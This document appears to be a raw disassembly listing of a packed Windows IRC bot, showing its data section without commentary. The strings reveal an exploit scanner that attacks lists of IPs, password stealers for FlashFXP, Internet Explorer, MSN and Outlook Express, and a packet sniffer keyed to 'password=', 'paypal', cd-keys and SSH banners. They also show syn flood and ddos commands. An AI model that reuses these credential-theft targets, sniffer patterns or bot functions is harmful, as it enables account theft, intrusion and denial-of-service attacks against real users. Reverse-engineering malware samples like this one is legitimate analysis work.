dword_41CE30 dd 6E695728h, 293233hdword_41CE38 dd 696E5528h, 2978hdword_41CE40 dd 63617041h, 252F6568h, 75haApache db 'Apache',0 ; DATA XREF: sub_41308F+1B9�o
align 4
aMicrosoftIisU_ db 'Microsoft-IIS/%u.%u',0 ; DATA XREF: sub_41308F+130�o
aMicrosoftIis db 'Microsoft-IIS',0 ; DATA XREF: sub_41308F+FC�o
align 4
aServer db 'Server:',0 ; DATA XREF: sub_41308F+7A�o
aOptionsHttp1_0 db 'OPTIONS / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_41308F+B�o
db 0Dh,0Ah,0
align 4
unk_41CE98 db 53h ; S ; DATA XREF: sub_41349C+5E4�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 65h, 64h, 20h
db 3
db 30h, 34h, 2
db 25h ; %
db 73h, 3, 2
db 3Ah ; :
db 25h, 73h, 20h
db 69h ; i
db 6Eh, 20h, 3
db 30h ; 0
db 34h, 2, 25h
db 30h ; 0
db 2Eh, 32h, 66h
db 3
db 2, 73h, 65h
db 63h ; c
db 2Eh, 20h, 3
db 30h ; 0
db 34h, 2, 25h
db 75h ; u
db 3, 2, 20h
aOpenIpSFound db 'open IP(s) found',0
align 4
dword_41CEDC dd 2343003h, 2037325h, 2073253Ah, 6F207369h, 6E6570h
; DATA XREF: sub_41349C+55E�o
dword_41CEF0 dd 3430032Dh, 3752502h, 53202D02h, 6E6E6163h, 20676E69h
; DATA XREF: sub_41349C+343�o
dd 2343003h, 2037325h, 2073253Ah, 20726F66h, 2343003h
dd 2037525h, 63657320h, 28646E6Fh, 2973h
dword_41CF28 dd 6E616353h, 676E696Eh, 34300320h, 3732502h, 73253A02h
; DATA XREF: sub_41349C+305�o
dd 726F6620h, 34300320h, 3752502h, 65732002h, 646E6F63h
dd 297328h
unk_41CF54 db 53h ; S ; DATA XREF: sub_413AB0+1DC�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 69h, 6Eh, 67h
db 20h
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
db 3Ah, 25h, 73h
db 20h
db 66h, 6Fh, 72h
db 20h
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aSecondSTUSU db ' second(s), t:%u s:%u',0
align 4
dword_41CF8C dd 3430032Dh, 3752502h, 41202D02h, 6D657474h, 64657470h
; DATA XREF: sub_413CB3+30E�o
dd 34300320h, 3752502h, 78652002h, 696F6C70h, 69746174h
dd 73286E6Fh, 6E6F2029h, 34300320h, 3752502h, 50492002h
dd 2E297328h, 0
dword_41CFD0 dd 65747441h, 6974706Dh, 7420676Eh, 7865206Fh, 696F6C70h
; DATA XREF: sub_413CB3+2B0�o
dd 30032074h, 73250234h, 77200203h, 20687469h, 2343003h
dd 2037325h, 2E2E2Eh
unk_41D000 db 2Dh ; - ; DATA XREF: sub_413CB3+31�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aAttemptingTo_0 db '- Attempting to exploit IP',27h,'s in list.',0
align 10h
aAttemptingToEx db 'Attempting to exploit IP',27h,'s in list.',0 ; DATA XREF: sub_413FE7+52�o
dword_41D054 dd 3003203Ah, 75250234h, 202E0203h, 0aExploitStatist db 'Exploit statistics - ',0 ; DATA XREF: sub_414052+29�o
align 4
aListingExploit db 'Listing exploit statistics',0 ; DATA XREF: sub_41417D+2B�o
align 4
dword_41D098 dd 62616E55h, 7420656Ch, 6F63206Fh, 63656E6Eh, 6F742074h
; DATA XREF: sub_4141C1+D8�o
dd 34300320h, 3732502h, 6F702002h, 3207472h, 25023430h
dd 2E020373h, 0
dword_41D0C8 dd 656D6954h, 2074756Fh, 7563636Fh, 20646572h, 6C696877h
; DATA XREF: sub_4141C1+B4�o
dd 6F632065h, 63656E6Eh, 676E6974h, 206F7420h, 2343003h
dd 2037325h, 3430033Ah, 3732502h, 202E02h
dword_41D100 dd 6E6E6F43h, 65746365h, 6F742064h, 34300320h, 3732502h
; DATA XREF: sub_4141C1+78�o
dd 30033A02h, 73250234h, 69200203h, 3003206Eh, 75250234h
dd 203736Dh, 2Eh
dword_41D130 dd 6E6E6F43h, 69746365h, 7420676Eh, 7325206Fh, 726F7020h
; DATA XREF: sub_4142BF+D8�o
dd 30032074h, 73250234h, 203h
unk_41D150 db 53h ; S ; DATA XREF: sub_4143B0+221�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 65h, 64h, 20h
db 25h ; %
db 73h, 20h, 69h
db 6Eh ; n
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 30h
db 2Eh ; .
db 32h, 66h, 3
db 2
db 73h, 65h, 63h
db 2Eh ; .
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 75h
db 3
db 2, 20h, 6Fh
aPenPortSFound db 'pen port(s) found',0
align 4
dword_41D18C dd 33A7325h, 25023430h, 20020373h, 6F207369h, 6E6570h
; DATA XREF: sub_4143B0+1BA�o
dword_41D1A0 dd 3430032Dh, 3752502h, 53202D02h, 6E6E6163h, 20676E69h
; DATA XREF: sub_4143B0+81�o
dd 70207325h, 2074726Fh, 2343003h, 2037525h, 3430032Dh
dd 3752502h, 69772002h, 3206874h, 25023430h, 20020375h
dd 6B636F73h, 73287465h, 29h
dword_41D1E8 dd 6E616353h, 676E696Eh, 20732520h, 74726F70h, 34300320h
; DATA XREF: sub_414600+1BE�o
dd 3752502h, 30032D02h, 75250234h, 77200203h, 20687469h
dd 2343003h, 2037525h, 636F7320h, 2874656Bh, 2973h
aYa36za48dehfrv db 'yA36zA48dEhfrvghGRg57h5UlDv3',0 ; DATA XREF: sub_4147E5+6�o
; sub_4147E5+C6�o
align 4
aSflashfxpSites db '%sFlashFXP\sites.dat',0 ; DATA XREF: sub_4148CE+107�o
align 4
aFlashfxpSites_ db '\FlashFXP\sites.dat',0 ; DATA XREF: sub_4148CE+B6�o
aProgramfiles db 'ProgramFiles',0 ; DATA XREF: sub_4148CE+AB�o
align 10h
aSites_dat db 'sites.dat',0 ; DATA XREF: sub_4148CE:loc_414945�o
align 4
aFlashfxp_exe1 db 'FlashFXP.exe %1',0 ; DATA XREF: sub_4148CE+57�o
aSoftwareClasse db 'SOFTWARE\Classes\Applications\FlashFXP.exe\shell\open\command',0
; DATA XREF: sub_4148CE+15�o
align 4
unk_41D2DC db 2Dh ; - ; DATA XREF: sub_414A1E+464�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
db 2Dh, 20h, 4Ch
db 69h ; i
db 73h, 74h, 65h
db 64h ; d
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 75h
db 3
db 2, 2Fh, 3
db 30h ; 0
db 34h, 2, 25h
db 75h ; u
db 3, 2, 20h
aFlashfxpPass_0 db 'FlashFXP password(s).',0
align 4
dword_41D318 dd 2343003h, 2037525ha_FlashfxpFtpSS db '. FlashFXP - ftp://%s:%s@%s:%s - %s',0
aPass127s db 0Dh,0Ah ; DATA XREF: sub_414A1E+352�o
db 'Pass=%127s',0Dh,0Ah,0
align 4
aUser127s db 0Dh,0Ah ; DATA XREF: sub_414A1E+338�o
db 'User=%127s',0Dh,0Ah,0
align 4
aPort127s db 0Dh,0Ah ; DATA XREF: sub_414A1E+31E�o
db 'Port=%127s',0Dh,0Ah,0
align 4
aIp127s db 0Dh,0Ah ; DATA XREF: sub_414A1E+304�o
db 'IP=%127s',0Dh,0Ah,0
align 4
asc_41D384 db '[%[^]]]',0Dh,0Ah,0 ; DATA XREF: sub_414A1E+2EA�o
align 10h
aPass_0 db 0Dh,0Ah ; DATA XREF: sub_414A1E+1F4�o
db 'Pass=',0
aUser_0 db 0Dh,0Ah ; DATA XREF: sub_414A1E+1DC�o
db 'User=',0
aPort db 0Dh,0Ah ; DATA XREF: sub_414A1E+1C4�o
db 'Port=',0
aIp db 0Dh,0Ah ; DATA XREF: sub_414A1E+1AC�o
db 'IP=',0
align 10h
asc_41D3B0 db 0Dh,0Ah ; DATA XREF: sub_414A1E:loc_414BA6�o
db 0Dh,0Ah
db '[',0
align 4
unk_41D3B8 db 2Dh ; - ; DATA XREF: sub_414A1E+55�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aListingFlashfx db '- Listing FlashFXP passwords',0
align 10h
aFlashfxpPasswo db 'FlashFXP password stealer',0 ; DATA XREF: sub_414EB0+2B�o
align 4
unk_41D3FC db 2Dh ; - ; DATA XREF: sub_414EF4+B8A�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
db 2Dh, 20h, 4Ch
db 69h ; i
db 73h, 74h, 65h
db 64h ; d
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 75h
db 3
db 2, 20h, 69h
aNternetExplore db 'nternet explorer password(s).',0
align 4
dword_41D438 dd 2343003h, 2037525h, 4549202Eh, 7475413Ah, 6D6F436Fh
; DATA XREF: sub_414EF4+AD8�o
dd 74656C70h, 61502065h, 6F777373h, 20736472h, 6953202Dh
dd 203A6574h, 2343003h, 2037325h, 614E202Eh, 203A656Dh
dd 2343003h, 2037325h, 6150202Eh, 6F777373h, 203A6472h
dd 2343003h, 2037325h, 2Eh
dword_41D494 dd 2343003h, 2037525h, 4549202Eh, 7475413Ah, 6F43206Fh
; DATA XREF: sub_414EF4+A2B�o
dd 656C706Dh, 66206574h, 646C6569h, 202D2073h, 6C656946h
dd 3203A64h, 25023430h, 2E020373h, 74614420h, 3203A61h
dd 25023430h, 2E020373h, 0
dword_41D4DC dd 70747468h, 2F3A73hdword_41D4E4 dd 70747468h, 2F3Ahdword_41D4EC dd 7274533Ah, 676E69h ; sub_414EF4+99A�o
aStringindex db 'StringIndex',0 ; DATA XREF: sub_414EF4+968�o
aE161255a db 'e161255a',0 ; DATA XREF: sub_414EF4:loc_415842�o
align 4
dword_41D50C dd 2343003h, 2037525h, 534D202Eh, 7845204Eh, 726F6C70h
; DATA XREF: sub_414EF4+935�o
dd 2D207265h, 4E534D20h, 3A444920h, 34300320h, 3732502h
dd 50202E02h, 77737361h, 3A64726Fh, 34300320h, 3732502h
dd 2E02h
dword_41D54C dd 2Ch ; sub_414EF4+852�o ...
aB9819c52 db 'b9819c52',0 ; DATA XREF: sub_414EF4:loc_4155CE�o
align 4
dword_41D55C dd 2343003h, 2037525h, 4549202Eh, 7361503Ah, 726F7773h
; DATA XREF: sub_414EF4+6C6�o
dd 72502D64h, 6365746Fh, 20646574h, 6953202Dh, 203A6574h
dd 2343003h, 2037325h, 614E202Eh, 203A656Dh, 2343003h
dd 2037325h, 6150202Eh, 6F777373h, 203A6472h, 2343003h
dd 2037325h, 2Eh
a5e7e8100 db '5e7e8100',0 ; DATA XREF: sub_414EF4:loc_41550C�o
align 10h
dword_41D5C0 dd 2343003h, 2037525h, 754F202Eh, 6F6F6C74h, 7078456Bh
; DATA XREF: sub_414EF4+604�o
dd 73736572h, 4E202D20h, 3A656D61h, 34300320h, 3732502h
dd 50202E02h, 77737361h, 3A64726Fh, 34300320h, 3732502h
dd 2E02h
a220d5cc1 db '220d5cc1',0 ; DATA XREF: sub_414EF4+5C2�o
align 4
aWs db '%ws',0 ; DATA XREF: sub_414EF4+41C�o
asc_41D610 db '%x',0 ; DATA XREF: sub_414EF4+234�o
align 4
unk_41D614 db 2Dh ; - ; DATA XREF: sub_414EF4+1A9�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aListingInterne db '- Listing internet explorer passwords',0
align 8
dword_41D648 dd 5A6F1EC0h, 11D02DB1h, 0C000398Ch, 6B12D94Fh ; sub_414EF4+2C7�o ...
aInternetExplor db 'Internet explorer password stealer',0 ; DATA XREF: sub_415AF0+36�o
align 4
dword_41D67C dd 65746E49h, 74736572h, 20676E69h, 636F7270h, 65737365h
; DATA XREF: sub_415B60+277�o
dd 202D2073h, 75736956h, 43206C61h, 36202B2Bh, 3003203Ah
dd 73250234h, 202E0203h, 65726E55h, 52496C61h, 203A4443h
dd 2343003h, 2037325h, 7453202Eh, 3A6D6165h, 34300320h
dd 3732502h, 57202E02h, 646C726Fh, 20664F20h, 63726157h
dd 74666172h, 3003203Ah, 73250234h, 202E0203h, 716E6F43h
dd 20726575h, 696C6E4Fh, 203A656Eh, 2343003h, 2037325h
dd 2Eh
aSoftwareValveS db 'Software\Valve\Steam',0 ; DATA XREF: sub_415B60+149�o
align 4
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\VisualStudio\6.0\Setup\Microsoft Visual C++',0
; DATA XREF: sub_415B60+10A�o
align 4
aConquer db '[Conquer]',0 ; DATA XREF: sub_415B60:loc_415C2F�o
align 10h
aWorldOfWarcraf db 'World Of Warcraft',0 ; DATA XREF: sub_415B60:loc_415C0E�o
align 4
aUnreal3 db 'Unreal3',0 ; DATA XREF: sub_415B60+8C�o
aListingInteres db 'Listing interesting processes',0 ; DATA XREF: sub_415DFD+2B�o
align 4
off_41D7AC dd offset aUser_1 ; DATA XREF: sub_415EB7+32�o
; "user "
dd offset aUnknown_1 ; "unknown "
dd offset aPass_2 ; "pass "
dd offset aMailpass ; "MailPass "
dd offset aOper ; "oper "
dd 0
dd offset aIdentify ; "identify "
dd 0
dd offset aAuth_0 ; " :auth "
dd 0
dd offset aPasswd_0 ; "passwd="
dd 0
dd offset aUsername_0 ; "username="
dd 0
dd offset aPassword_0 ; "password="
dd 0
dd offset aLogin_1 ; "login="
dd 0
dd offset aPass_1 ; "pass="
dd 0
dd offset aPw ; "pw="
dd 2 dup(0)
off_41D808 dd offset aLogin_0 ; DATA XREF: sub_415EB7+54�o
; "login "
align 10h
dd offset aSxt ; "sxt "
align 8
dd offset aAuth ; "auth "
align 10h
dd offset aPasswort ; "passwort "
align 8
dd offset aCdkey ; "cdkey"
align 10h
dd offset aCdKey_0 ; "cd-key"
align 8
dd offset aCdKey ; "cd key"
align 10h
dd offset aPassword ; "password"
align 8
dd offset aPaypal_com ; "paypal.com"
dd 0
dd offset aPaypal ; "paypal"
align 8
dd offset aIrcOperator ; "irc operator"
align 10h
dd offset aLP ; "l/p"
align 8
dd offset aSsh1_5 ; "SSH-1.5"
align 10h
dd offset aSsh1_99 ; "SSH-1.99"
dd 2 dup(0)
off_41D87C dd offset aSetCookie ; DATA XREF: sub_415EB7+76�o
; "Set-Cookie:"
dd 0
dd offset aSyn ; "syn"
dd 0
dd offset aFlood ; "flood "
dd 0
dd offset aClone ; "clone "
dd 0
dd offset aServU_0 ; "serv-u"
dd 0
dd offset aServU ; "serv u"
dd 0
dd offset aServu ; "servu"
dd 0
dd offset aDdos ; "ddos"
align 10h
off_41D8C0 dd offset dword_41D91C ; DATA XREF: sub_415EB7+98�o
align 8
dd offset dword_41D914
align 10h
dd offset dword_41D90C
align 8
dd offset dword_41D904
align 10h
dd offset dword_41D8FC
align 8
dd offset dword_41D8F4
dd 2 dup(0)
dword_41D8F4 dd 54495551h, 20hdword_41D8FC dd 54524150h, 20hdword_41D904 dd 4E494F4Ah, 20hdword_41D90C dd 49504F54h, 2043hdword_41D914 dd 49544F4Eh, 204543hdword_41D91C dd 56495250h, 2047534Dh, 0aDdos db 'ddos',0 ; DATA XREF: UPX1:0041D8B4�o
align 10h
aServu db 'servu',0 ; DATA XREF: UPX1:0041D8AC�o
align 4
aServU db 'serv u',0 ; DATA XREF: UPX1:0041D8A4�o
align 10h
aServU_0 db 'serv-u',0 ; DATA XREF: UPX1:0041D89C�o
align 4
aClone db 'clone ',0 ; DATA XREF: UPX1:0041D894�o
align 10h
aFlood db 'flood ',0 ; DATA XREF: UPX1:0041D88C�o
align 4
aSyn db 'syn',0 ; DATA XREF: UPX1:0041D884�o
aSetCookie db 'Set-Cookie:',0 ; DATA XREF: UPX1:off_41D87C�o
aSsh1_99 db 'SSH-1.99',0 ; DATA XREF: UPX1:0041D870�o
align 4
aSsh1_5 db 'SSH-1.5',0 ; DATA XREF: UPX1:0041D868�o
aLP db 'l/p',0 ; DATA XREF: UPX1:0041D860�o
aIrcOperator db 'irc operator',0 ; DATA XREF: UPX1:0041D858�o
align 10h
aPaypal db 'paypal',0 ; DATA XREF: UPX1:0041D850�o
align 4
aPaypal_com db 'paypal.com',0 ; DATA XREF: UPX1:0041D848�o
align 4
aCdKey db 'cd key',0 ; DATA XREF: UPX1:0041D838�o
align 4
aCdKey_0 db 'cd-key',0 ; DATA XREF: UPX1:0041D830�o
align 4
aCdkey db 'cdkey',0 ; DATA XREF: UPX1:0041D828�o
align 4
aPasswort db 'passwort ',0 ; DATA XREF: UPX1:0041D820�o
align 4
aAuth db 'auth ',0 ; DATA XREF: UPX1:0041D818�o
align 10h
aSxt db 'sxt ',0 ; DATA XREF: UPX1:0041D810�o
align 4
aLogin_0 db 'login ',0 ; DATA XREF: UPX1:off_41D808�o
align 10h
aPw db 'pw=',0 ; DATA XREF: UPX1:0041D7FC�o
aPass_1 db 'pass=',0 ; DATA XREF: UPX1:0041D7F4�o
align 4
aLogin_1 db 'login=',0 ; DATA XREF: UPX1:0041D7EC�o
align 4
aPassword_0 db 'password=',0 ; DATA XREF: UPX1:0041D7E4�o
align 10h
aUsername_0 db 'username=',0 ; DATA XREF: UPX1:0041D7DC�o
align 4
aPasswd_0 db 'passwd=',0 ; DATA XREF: UPX1:0041D7D4�o
aAuth_0 db ' :auth ',0 ; DATA XREF: UPX1:0041D7CC�o
aIdentify db 'identify ',0 ; DATA XREF: UPX1:0041D7C4�o
align 4
aOper db 'oper ',0 ; DATA XREF: UPX1:0041D7BC�o
align 10h
aMailpass db 'MailPass ',0 ; DATA XREF: UPX1:0041D7B8�o
align 4
aPass_2 db 'pass ',0 ; DATA XREF: UPX1:0041D7B4�o
align 4
aUnknown_1 db 'unknown ',0 ; DATA XREF: UPX1:0041D7B0�o
align 10h
aUser_1 db 'user ',0 ; DATA XREF: UPX1:off_41D7AC�o
align 4
dword_41DA58 dd 70737553h, 6F696369h, 70207375h, 656B6361h, 72662074h
; DATA XREF: sub_415F69+5CE�o
dd 3206D6Fh, 25023430h, 3A020373h, 2343003h, 2037525h
dd 73253E2Dh, 2075253Ah, 0
unk_41DA8C db 2Dh ; - ; DATA XREF: sub_415F69+1A6�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
db 2Dh, 20h, 4Ch
db 65h ; e
db 76h, 65h, 6Ch
db 20h
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aPacketSnifferR db ' packet sniffer running',0
align 10h
dword_41DAC0 dd 6576654Ch, 3003206Ch, 75250234h, 70200203h, 656B6361h
; DATA XREF: sub_41665C+8E�o
dd 6E732074h, 65666669h, 72h, 41DAE4h, 84B6AD89h, 0B8A0BAE6h
dd 91C499ECh, 2 dup(0)
dword_41DAF8 dd 0B1790F4Ch ; UPX0:00416845�r ...
dword_41DAFC dd 6F035C08h dword_41DB00 dd 12E3F4F6h dword_41DB04 dd 0A1A8C30Ch dd 35h, 0
off_41DB10 dd offset dword_41DE18 ; DATA XREF: sub_40E618+1C3�r
; sub_40E618+1D5�r ...
align 8
off_41DB18 dd offset dword_41CCF8 ; DATA XREF: sub_40A9CF+7B3�r
; sub_40CF2F+82�r ...
off_41DB1C dd offset nullsub_5 ; DATA XREF: sub_40CF2F+B8�r
dword_41DB20 dd 0 ; sub_40CF2F+DF�r
dd offset dword_41CCD8
dd offset dword_41CCCC
align 10h
dd offset dword_41CCAC
dd offset nullsub_166
dd 0
dd offset dword_41CC84
dd offset nullsub_167
align 8
dd offset loc_41CC58
dd offset dword_41CC4C
dd 0
dd offset dword_41CC34
dd offset nullsub_168
align 10h
dd offset loc_41CC0C
dd offset nullsub_169
dd 4 dup(0)
dword_41DB78 dd 0D7E6FDC6h, 0F7EBEBF7h, 2 dup(0) ; sub_40D871:loc_40DCB8�o
dword_41DB88 dd 69702323h, 2323h, 1Eh dup(0) ; sub_4093B6+6C�o ...
byte_41DC08 db 0DAh ; DATA XREF: sub_40D043+28C�r
; sub_40D043+297�o
db 0E1h, 0B1h, 81h
dd 0EBF7BDB8h, 1Eh dup(0)
byte_41DC88 db 0 ; DATA XREF: sub_40D043+2B3�r
; sub_40D043+2BE�o
align 4
dd 1Fh dup(0)
dword_41DD08 dd 3430032Eh, 2036202h, 0 ; sub_40D871+242�o
dword_41DD14 dd 8BBBA78Eh, 0E6E6E7A4h, 0DA9AA6h, 3Eh dup(0) ; sub_406AE7+2E�o
dword_41DE18 dd 80B682D3h, 0E6A7B0BBh, 85DE92B1h, 0BFFEh, 0dword_41DE2C dd 3430032Dh, 62656402h, 2036775haEipHasLeftTheE db '- eip has left the endless loop for some reason...',0
align 4
aEntry db 'entry',0 ; DATA XREF: UPX0:00416AE7�o
align 4
aLoop db 'loop',0 ; DATA XREF: UPX0:loc_416AC5�o
align 4
aPing08x db 'PING :%08X',0 ; DATA XREF: UPX0:00416A54�o
align 4
a08xX08x3x08x08 db '%08x%x%08x%3x%08x%08x',0 ; DATA XREF: UPX0:0041684B�o
align 10h
dword_41DEA0 dd 0DF0B3D60h, 101B548Fh, 8658Eh, 19D12B2Bhoff_41DEB0 dd offset off_4172BC ; DATA XREF: UPX1:off_4172C0�o
; UPX1:004172FC�o ...
align 8
a_?av_com_error db '.?AV_com_error@@',0
align 10h
off_41DED0 dd offset off_4172BC ; DATA XREF: UPX1:off_417308�o
; UPX1:00417344�o
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
dword_41DEE8 dd 0 ; sub_401856+21�r ...
dword_41DEEC dd 0 ; sub_401856+36�r ...
dword_41DEF0 dd 0 ; sub_401856+4B�r ...
dword_41DEF4 dd 0 ; sub_401856+C�r ...
dd 0
dword_41DEFC dd 0 ; sub_4018AF+62�r ...
byte_41DF00 db 0 ; DATA XREF: sub_401981+1BA�o
; sub_402A32+57�r ...
align 8
dword_41DF08 dd 0 ; sub_404CBB+1B�r ...
dword_41DF0C dd 0 dword_41DF10 dd 7C80B829h ; resolved to->KERNEL32.InitializeCriticalSectionAndSpinCount ; sub_409C36+12�r ...
align 8
dword_41DF18 dd 5B86A313h dword_41DF1C dd 5B86D617h dword_41DF20 dd 5B86FD69h dword_41DF24 dd 5B894541h dword_41DF28 dd 5B868E65h dword_41DF2C dd 5B8A3009h dword_41DF30 dd 5B867750h dword_41DF34 dd 5B897BE9h dword_41DF38 dd 5B8A5DD1h dword_41DF3C dd 71B2517Fh dword_41DF40 dd 71B2578Ch dword_41DF44 dd 71B2547Ah dword_41DF48 dd 71B25099h dword_41DF4C dd 42C5AE03h ; resolved to->WININET.InternetGetConnectedStateExA ; sub_408B30+118�r ...
dword_41DF50 dd 5E0C53F7h ; sub_414EF4+6C�r ...
dword_41DF54 dd 71AB2A6Fh ; resolved to->WS2_32.getaddrinfo ; sub_403BD3+197�r ...
dword_41DF58 dd 71ABC671h ; resolved to->WS2_32.getnameinfo ; sub_403BD3+17F�w ...
dword_41DF5C dd 71AB2B0Bh ; resolved to->WS2_32.freeaddrinfo ; sub_403BD3+1A9�r ...
dd 101h dup(0)
dword_41E364 dd 0 ; sub_4042FB+20�o
dword_41E368 dd 0 ; sub_4042FB:loc_404327�r
align 10h
dword_41E370 dd 76BF1F1Ch ; sub_405FA3+7A�r ...
dword_41E374 dd 76BF2075h ; sub_405FA3+83�r ...
dword_41E378 dd 76BF21C2h ; sub_405FA3+8C�r ...
dword_41E37C dd 76BF3A9Ah ; sub_405FA3+71�r ...
dword_41E380 dd 148B10h, 0FFFFFFFFh, 5 dup(0) ; sub_406041+B�o ...
byte_41E39C db 1 ; DATA XREF: sub_405FA3+95�w
; sub_406041+16�r
align 10h
dword_41E3A0 dd 0 ; sub_409226+77�w ...
align 8
dword_41E3A8 dd 148B38h, 0FFFFFFFFh, 4 dup(0) ; sub_4095A4+6�o ...
dword_41E3C0 dd 0 ; sub_4095A4+11�r ...
align 8
dword_41E3C8 dd 864FC0h ; sub_4095A4+57�r ...
dword_41E3CC dd 0 ; sub_409DD0+65�w ...
dword_41E3D0 dd 0 ; sub_409DD0+44�r ...
dword_41E3D4 dd 0 ; sub_409DD0+91�w ...
dword_41E3D8 dd 0 ; sub_409DD0+7B�w ...
align 10h
byte_41E3E0 db 0 ; DATA XREF: sub_409DD0+29�r
; sub_409DD0+96�w
align 4
dd 101h dup(0)
byte_41E7E8 db 0 ; DATA XREF: sub_40CF2F+4B�o
; sub_40CF2F+5E�o ...
align 4
dd 5Fh dup(0)
dword_41E968 dd 40h dup(0) ; sub_40CF2F+A6�o ...
dword_41EA68 dd 3 dup(0) ; sub_40CF2F+36�o ...
dword_41EA74 dd 0 ; sub_40D366+15�r ...
dd 0
dword_41EA7C dd 0 ; sub_40E618:loc_40E66D�w
byte_41EA80 db 0 ; DATA XREF: sub_40E979+1D�w
; sub_40E979+46�w ...
align 4
dd 9 dup(0)
dd 3E000000h, 3F000000h, 37363534h, 3B3A3938h, 3D3Ch, 0
dd 2010000h, 6050403h, 0A090807h, 0E0D0C0Bh, 1211100Fh
dd 16151413h, 191817h, 0
db 0
db 1Ah, 1Bh, 1Ch
db 1Dh
db 1Eh, 1Fh, 20h
a_0123 db '!"#$%&',27h,'()*+,-./0123',0
dd 22h dup(0)
byte_41EB84 db 0F2h ; DATA XREF: sub_40ECEB+29�o
; sub_40ECEB+35�o ...
aShmmhNaII db 0Bh,'HMMH',0Bh,'ө',0
align 4
dword_41EB98 dd 85E7D1A7h, 0C5FDFDC5h, 0B939B9D1h, 1987FB7Bh, 0
; DATA XREF: sub_40ED6E+29�o
; sub_40ED6E+35�o ...
dword_41EBAC dd 0E29DB79Fh ; sub_410318+7�w ...
dword_41EBB0 dd 2C2B09C1h ; sub_410318+11�w ...
dword_41EBB4 dd 4FC6EA1Eh ; sub_410318+1B�w ...
dword_41EBB8 dd 0F2BD1115h ; sub_410318+25�w ...
align 10h
byte_41EBC0 db 0F9h ; DATA XREF: sub_41055F+29�o
; sub_41055F+35�o ...
; ---------------------------------------------------------------------------
retn 0E8D9h
; ---------------------------------------------------------------------------
enter 0FFFFD4D4h, 0C8h
retn 0B6F6h
; ---------------------------------------------------------------------------
db 0F6h
; ---------------------------------------------------------------------------
xchg eax, edi
xlat
jmp near ptr byte_41EC79
; ---------------------------------------------------------------------------
align 8
dword_41EBD8 dd 2 dup(0) dword_41EBE0 dd 0 dword_41EBE4 dd 2 dup(0) dword_41EBEC dd 0 ; sub_4127D0+16�w
dword_41EBF0 dd 0 ; sub_4127D0:loc_4128A0�r
dword_41EBF4 dd 2 dup(0) ; sub_412E04+7F�o
dword_41EBFC dd 6B636170h, 652E6465h, 6578h, 1Ch dup(0) ; sub_407148+172�o ...
db 0
byte_41EC79 db 3 dup(0) ; CODE XREF: UPX1:0041EBCE�j
dd 21h dup(0)
dword_41ED00 dd 0E72EAD95h ; UPX0:00416909�w
dword_41ED04 dd 91BC7F77h dword_41ED08 dd 0C71DA47Ah dword_41ED0C dd 8DCDF7A2h dword_41ED10 dd 6B636170h, 652E6465h, 6578h, 3Fh dup(0) ; sub_40A9CF+C51�o ...
dword_41EE18 dd 40h dup(0) ; sub_40A9CF+108E�o ...
byte_41EF18 db 0 ; DATA XREF: sub_40D043+FF�r
; sub_40D043+10A�o ...
align 4
dd 1Fh dup(0)
byte_41EF98 db 0 ; DATA XREF: sub_403DF3:loc_403F07�r
; sub_403DF3+11F�o ...
align 4
dd 1Fh dup(0)
dword_41F018 dd 40h dup(0) ; sub_4055E5+746�o ...
byte_41F118 db 0 ; DATA XREF: sub_40A9CF+1F37�o
; sub_40D043:loc_40D0D6�r ...
align 4
dd 3B9h dup(0)
dd 0E0h, 16030h, 74654701h, 73726556h, 456E6F69h, 1004178h
dd 4C746547h, 6C61636Fh, 666E4965h, 100416Fh, 43746553h
dd 65727275h, 6944746Eh, 74636572h, 4179726Fh, 736C0100h
dd 656C7274h, 100416Eh, 57746547h, 6F646E69h, 69447377h
dd 74636572h, 4179726Fh, 72430100h, 65746165h, 656C6946h
dd 47010041h, 69467465h, 6954656Ch, 100656Dh, 46746553h
dd 54656C69h, 656D69h, 74654701h, 74737953h, 69446D65h
dd 74636572h, 4179726Fh, 6F4C0100h, 694C6461h, 72617262h
dd 1004179h, 50746547h, 41636F72h, 65726464h, 1007373h
dd 74697845h, 636F7250h, 737365h, 706F4301h, 6C694679h
dd 1004165h, 4C746547h, 45747361h, 726F7272h, 72570100h
dd 46657469h, 656C69h, 61655301h, 50686372h, 41687461h
dd 72430100h, 65746165h, 65706950h, 65470100h, 72754374h
dd 746E6572h, 636F7250h, 737365h, 74654701h, 706D6F43h
dd 72657475h, 656D614Eh, 43010041h, 74616572h, 6F725065h
dd 73736563h, 50010041h, 4E6B6565h, 64656D61h, 65706950h
dd 65470100h, 69784574h, 646F4374h, 6F725065h, 73736563h
dd 65520100h, 69466461h, 100656Ch, 4D746547h, 6C75646Fh
dd 6E614865h, 41656C64h, 65470100h, 646F4D74h, 46656C75h
dd 4E656C69h, 41656D61h, 704F0100h, 72506E65h, 7365636Fh
dd 52010073h, 50646165h, 65636F72h, 654D7373h, 79726F6Dh
dd 6C530100h, 706565h, 72655401h, 616E696Dh, 72506574h
dd 7365636Fh, 43010073h, 65736F6Ch, 646E6148h, 100656Ch
dd 46746553h, 41656C69h, 69727474h, 65747562h, 1004173h
dd 656C6544h, 69466574h, 41656Ch, 636F4C01h, 72466C61h
dd 1006565h, 61657243h, 68546574h, 64616572h, 6E550100h
dd 5670616Dh, 4F776569h, 6C694666h, 4D010065h, 69567061h
dd 664F7765h, 656C6946h, 72430100h, 65746165h, 656C6946h
dd 7070614Dh, 41676E69h, 6C470100h, 6C61626Fh, 6F6D654Dh
dd 74537972h, 73757461h, 65470100h, 73694474h, 6572466Bh
dd 61705365h, 78456563h, 47010041h, 72447465h, 54657669h
dd 41657079h, 65470100h, 63695474h, 756F436Bh, 100746Eh
